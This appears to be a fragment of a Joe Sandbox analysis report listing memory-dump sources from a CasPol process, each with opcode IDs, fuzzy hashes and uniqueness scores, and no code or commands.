                                                                                      • Snapshot File: hcaresult_8_2_1d6b0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 970c79eaaf775657177332471ee63c35997189aeb0dcf8b03df30edcae96928c
                                                                                      • Instruction ID: 13f71c8a3d3904373b21919c5f201ea8227c2362d736f126c19da9bb2ff19723
                                                                                      • Opcode Fuzzy Hash: 970c79eaaf775657177332471ee63c35997189aeb0dcf8b03df30edcae96928c
                                                                                      • Instruction Fuzzy Hash: 4F41AC34A01328CFCB65DF64C89C689B7B2BF49719F1081E9D80AA3355DB325E82CF02
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737138381.000000001D63D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D63D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d63d000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3932de11606ffe7e246fbf208748de500c80f02377446654f9c09b905e36c8c0
                                                                                      • Instruction ID: b0e98b9eade6fe294ed3e24213b52ae1c77fdd939b42b7036edb82cfc194d9c2
                                                                                      • Opcode Fuzzy Hash: 3932de11606ffe7e246fbf208748de500c80f02377446654f9c09b905e36c8c0
                                                                                      • Instruction Fuzzy Hash: 7821F571604240FFDB01DF18D9C0B2ABB65FBA8725F24C569E94D4B247C336E456CBA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737256363.000000001D64D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D64D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d64d000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 518f2dcd5ae0399d0d29f9f4f56c317adcd0122aa4e15c135b5fe5471adadb17
                                                                                      • Instruction ID: bca1c7c07b7b3b05d996aaa828ce10848069ae722ff92f2ff365c65f1bf6c1bb
                                                                                      • Opcode Fuzzy Hash: 518f2dcd5ae0399d0d29f9f4f56c317adcd0122aa4e15c135b5fe5471adadb17
                                                                                      • Instruction Fuzzy Hash: 89210775608240DFDB03CF24DDD0B2ABB65FB88718F34C569E9494B247C73AD846CA62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737256363.000000001D64D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D64D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d64d000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 75e9ed994ee708b51e3a3ef3e1c67d1bb7ad8738162a7403b37e23c3d1425075
                                                                                      • Instruction ID: a6f1ca17b60c8250f2b3652b819e6c8ce9cfe25fa94e05c02af9f87623806e94
                                                                                      • Opcode Fuzzy Hash: 75e9ed994ee708b51e3a3ef3e1c67d1bb7ad8738162a7403b37e23c3d1425075
                                                                                      • Instruction Fuzzy Hash: 42215375508780DFC703CF14D994B15BF71EF4A214F24C59AD8494B257C33AD85ACB62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.46737138381.000000001D63D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D63D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_1d63d000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 58686b495e09e740e2748f757843e814b7abd4f56b5b26110f52cc9b08b5b456
                                                                                      • Instruction ID: 150bb0db9984c7a824718fced14e7cce1dcb84bad3fd4ff241a1cfcc5ac8fc12
                                                                                      • Opcode Fuzzy Hash: 58686b495e09e740e2748f757843e814b7abd4f56b5b26110f52cc9b08b5b456
                                                                                      • Instruction Fuzzy Hash: 43117F76504280DFCB01CF14DAC4B16BF62FB98325F24C5A9D9494B656C33AE45ACFA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%